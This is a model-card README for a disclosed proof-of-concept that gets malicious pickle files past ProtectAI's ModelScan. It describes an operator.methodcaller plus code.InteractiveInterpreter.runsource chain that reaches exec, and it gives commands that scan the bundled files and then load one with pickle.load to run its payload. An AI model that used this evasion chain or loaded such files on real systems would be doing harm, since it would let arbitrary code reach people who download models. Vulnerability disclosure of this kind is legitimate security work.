---
tags:
  - modelscan
  - picklescan
  - bypass
  - rce
  - proof-of-concept
library_name: generic
---

# ModelScan Bypass PoC: `code.InteractiveInterpreter.runsource()` + `operator.methodcaller()`

## Overview

This is a proof-of-concept demonstrating a **new bypass** of ProtectAI ModelScan (v0.8.x),
the model scanner used by HuggingFace to detect malicious pickle models.

## Bypass Mechanism

ModelScan blocks pickle `GLOBAL` opcodes for known dangerous modules (os, subprocess, pickle, builtins.eval, etc.)
but fails to block `code.InteractiveInterpreter` and `operator.methodcaller`.

The exploit chain:
```python
operator.methodcaller("runsource", PAYLOAD)(code.InteractiveInterpreter())
  = code.InteractiveInterpreter().runsource(PAYLOAD)
  = compile(PAYLOAD) + exec(PAYLOAD)
```

## Files

| File | Format | Description |
|------|--------|-------------|
| `code_bypass.pkl` | Pickle (v5) | Raw pickle file, 171 bytes |
| `code_bypass.joblib` | joblib | .joblib format, 298 bytes |

## Verification

```bash
# Install modelscan
pip install modelscan

# Scan - will report "No issues found"
modelscan --path code_bypass.pkl

# Execute - will run the payload
python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))"
```

## Disclosure

- **Researcher:** xiaoyaoes
- **Date:** 2026-06-18
- **Status:** Reported via Huntr MFV program